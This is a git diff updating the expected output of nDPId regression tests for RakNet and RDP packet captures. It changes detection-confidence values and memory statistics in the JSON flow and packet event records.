+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946711624286,"flow_last_seen":946711624425,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713048623,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713064624,"flow_last_seen":946713064624,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":946713064624,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946713064624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":946713064624,"pkt":"eJS0JASgYDjgxTWgCABFAAAzl7tAAD8RKJzAqAJklJkjza3V6n8AHysXwAAFAQAAAAEAAAABAAAAAQAAAAEAAAA="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713064624,"flow_last_seen":946713064624,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":946713064624,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713064624,"flow_last_seen":946713064624,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":946713064624,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713124625,"flow_last_seen":946713124625,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":946713124625,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":59935,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946713124625,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":946713124625,"pkt":"eJS0JASgYDjgxTWgCABFAABBl7tAAD8RKJzAqAJklJkjza3V6h8ALSsXHBERERERERERIiIiIiIiIiIzMzMzMzMzMzMzMzMzMzMzAAJBQQ=="} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946713184626,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":946713184626,"pkt":"eJS0JASgYDjgxTWgCABFAABBl7tAAD8RKJzAqAJklJkjza3V6h8ALSsXHBERERERERERIiIiIiIiIiIzMzMzMzMzMzMzMzMzMzMzAAJBQQ=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946713244627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":946713244627,"pkt":"eJS0JASgYDjgxTWgCABFAABBl7tAAD8RKJzAqAJklJkjza3V6h8ALSsXHBERERERERERIiIiIiIiIiIzMzMzMzMzMzMzMzMzMzMzAAJBQQ=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713124625,"flow_last_seen":946713244627,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":59935,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713048606,"flow_last_seen":946713048606,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60690,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713064624,"flow_last_seen":946713064624,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048610,"flow_last_seen":946713048623,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60005,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946713048252,"flow_last_seen":946713048361,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32951,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048389,"flow_last_seen":946713048392,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32952,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 
-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048361,"flow_last_seen":946713048365,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60022,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048554,"flow_last_seen":946713048601,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32953,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048402,"flow_last_seen":946713048422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60025,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713124625,"flow_last_seen":946713244627,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":59935,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713048606,"flow_last_seen":946713048606,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60690,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713064624,"flow_last_seen":946713064624,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048610,"flow_last_seen":946713048623,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60005,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946713048252,"flow_last_seen":946713048361,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32951,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048389,"flow_last_seen":946713048392,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32952,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048361,"flow_last_seen":946713048365,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60022,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048554,"flow_last_seen":946713048601,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32953,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048402,"flow_last_seen":946713048422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60025,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713304628,"flow_last_seen":946713304628,"flow_idle_time":200000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":43582,"dst_port":44501,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946713304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":946713304628,"pkt":"YDjgxTWgeJS0JASgCABFAACKI+hAADcRpAiUmSPNwKgCZKo+rdUAdsFUhAAAAGADAAAAAAAAAAAQBKVFe3qt1QBdBPUP8\/vqfgRrZtwy6n4E\/\/\/\/\/wAABP\/\/\/\/8AAAT\/\/\/\/\/AAAE\/\/\/\/\/wAABP\/\/\/\/8AAAT\/\/\/\/\/AAAE\/\/\/\/\/wAABP\/\/\/\/8AAAAAAAAAAC74AAAAEwwKWtY="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713304628,"flow_last_seen":946713304628,"flow_idle_time":200000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":43582,"dst_port":44501,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713124625,"flow_last_seen":946713244627,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":59935,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713304628,"flow_last_seen":946713304628,"flow_idle_time":200000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":43582,"dst_port":44501,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713304628,"flow_last_seen":946713304628,"flow_idle_time":200000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":43582,"dst_port":44501,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713124625,"flow_last_seen":946713244627,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":59935,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713304628,"flow_last_seen":946713304628,"flow_idle_time":200000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":946713304628,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":43582,"dst_port":44501,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","packets-captured":66,"packets-processed":66,"total-skipped-flows":0,"total-l4-payload-len":6616,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":70,"global_ts_msec":946713304628} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 66/66 @@ -76,9 +76,9 @@ ~~ total active/idle flows...: 12/12 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883017 bytes -~~ total memory freed........: 5883017 bytes -~~ total allocations/frees...: 118224/118224 +~~ total memory allocated....: 6016651 bytes +~~ total memory freed........: 6016651 bytes +~~ total allocations/frees...: 120986/120986 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 458 chars ~~ json string max len.......: 2398 chars diff --git a/test/results/rdp.pcap.out b/test/results/rdp.pcap.out index 7c8c5cf08..680172806 100644 
--- a/test/results/rdp.pcap.out
+++ b/test/results/rdp.pcap.out
@@ -4,8 +4,8 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1559207465138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1559207465138,"pkt":"AgAAAEUAAEAAAEAAQAbIuKwQArnAqAKOzQ4NPfm84lgAAAAAsML\/\/7iqAAACBAT5AQMDBQEBCAoLUEqcAAAAAAQCAAA="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1559207465180,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1559207465180,"pkt":"AgAAAEUAADRflEAAfwYqMMCoAo6sEAK5DT3NDkeav7z5vOJZgBL6AEVOAAACBAW0AQMDAAEBBAI="} 00431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1559207465181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1559207465181,"pkt":"AgAAAEUAACgAAEAAQAbI0KwQArnAqAKOzQ4NPfm84llHmr+9UBAgAGAaAAA="} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1559207465138,"flow_last_seen":1559207465181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1559207465181,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File 
Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} -00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2010,"flow_first_seen":1559207465138,"flow_last_seen":1559207472692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1273,"flow_tot_l4_payload_len":534243,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1559207472692,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1559207465138,"flow_last_seen":1559207465181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1559207465181,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} 
